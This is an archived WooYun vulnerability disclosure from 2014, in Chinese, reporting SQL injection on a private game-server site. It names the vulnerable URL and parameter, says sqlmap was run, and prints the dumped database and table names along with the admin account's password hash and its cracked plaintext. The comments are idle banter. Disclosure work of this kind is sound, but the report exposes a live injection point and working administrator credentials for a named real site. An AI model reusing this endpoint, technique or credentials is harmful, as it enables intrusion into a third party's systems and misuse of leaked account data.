某个私服站点有SQL注射漏洞

编号71561
Urlhttp://www.wooyun.org/bug.php?action=view&id=71561
漏洞状态未联系到厂商或者厂商积极忽略
漏洞标题某个私服站点有SQL注射漏洞
漏洞类型
厂商http://www.8090yxs.com/
白帽子Jn·
提交日期2014-08-08 15:15:00
公开日期2014-09-22 15:16:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank0
漏洞简介
搜搜搜. 一道道剑光飞过,再这时灵石一扫突然发现前面有个穿丝袜的美女....于事如何请下次听讲
漏洞细节

哎5068都联系不到厂商,不知道这个私服站点...果断提交
注入地址:http://member.8090yxs.com/api/address.php?sname=
直接上SLQMAP神器

裤名.png


QQ截图20140807202856.png


available databases [3]:
[*] 8090_activity
[*] data8090
[*] information_schema
Database: 8090_activity
[77 tables]
+--------------------------+
| butt_user |
| card_address |
| cj_card |
| cj_prize |
| cj_reward |
| cjxx |
| cy_cj_card |
| cy_cj_prize |
| cy_cj_reward |
| han_wang |
| lhzs_0121_card |
| lhzs_0121_prize |
| lhzs_0121_reward |
| lhzs_0903_card |
| lhzs_0903_prize |
| lhzs_0903_reward |
| lhzs_1206_card |
| lhzs_1206_prize |
| lhzs_1206_reward |
| lhzs_20130722_card |
| lhzs_20130722_prize |
| lhzs_20130722_reward |
| lhzs_bf_card |
| lhzs_bf_card_copy |
| lhzs_bf_card_copy1 |
| lhzs_bf_prize |
| lhzs_bf_prize_copy |
| lhzs_bf_reward |
| lhzs_bf_reward_copy |
| lhzs_cj_card |
| lhzs_cj_prize |
| lhzs_cj_reward |
| lhzs_fang_bf_card |
| lhzs_fang_bf_prize |
| lhzs_fang_bf_reward |
| lhzs_fang_card |
| lhzs_fang_prize |
| lhzs_fang_reward |
| nslm_0929_answer |
| num |
| plug_games |
| plug_platform |
| sctx_liuyan |
| sfj_admin |
| sfj_ks |
| sfj_tk |
| sfj_user |
| sjb |
| tab_config |
| tb_butt |
| tb_butt_copy |
| tlcs_0802_card |
| tlcs_qd |
| tlcs_record |
| tlcs_reward |
| wssg_fang_prize |
| wssg_fang_prize_copy |
| wssg_fang_prize_copy1 |
| wssg_fang_reward |
| www_1231 |
| wy_0108_card |
| wy_0108_prize |
| wy_0108_reward |
| wy_1121_card |
| wy_1121_card_copy |
| wy_1121_prize |
| wy_1121_reward |
| wz_0226_reward |
| wz_1130_reward |
| wz_1230_reward |
| zuiwuji_0226_card |
| zuiwuji_0226_card_copy |
| zuiwuji_0226_prize |
| zuiwuji_0226_prize_copy |
| zuiwuji_0226_prize_copy1 |
| zuiwuji_0226_reward |
| zuiwuji_0226_reward_copy |
+--------------------------+
Database: 8090_activity
Table: sfj_admin
[1 entry]
+----+----------------------------------+----------+
| id | passwd | username |
+----+----------------------------------+----------+
| 1 | 63ee451939ed580ef3c4b6f0109d1fd0 | admin | 123123
+----+----------------------------------+----------+

POC

裤名.png

修复方案

状态信息 2014-08-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-09-22: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复(not set)
回应信息未能联系到厂商或者厂商积极拒绝
Showing 1-5 of 5 items.
评论内容评论人点赞数评论时间

......

名字xsser02015-06-19 22:29:00

@草榴社区 我K,这名字?1024啊~~~

小卖部部长02014-09-23 12:58:00

看到标题,我震精了。。

无名02014-08-10 18:56:00

及其煞笔的玩意,我找一堆低版本的DVBBS,某个人站点有SQL注入,上传漏洞,

草榴社区02014-08-09 16:14:00

什么玩意。。

小震02014-08-09 10:36:00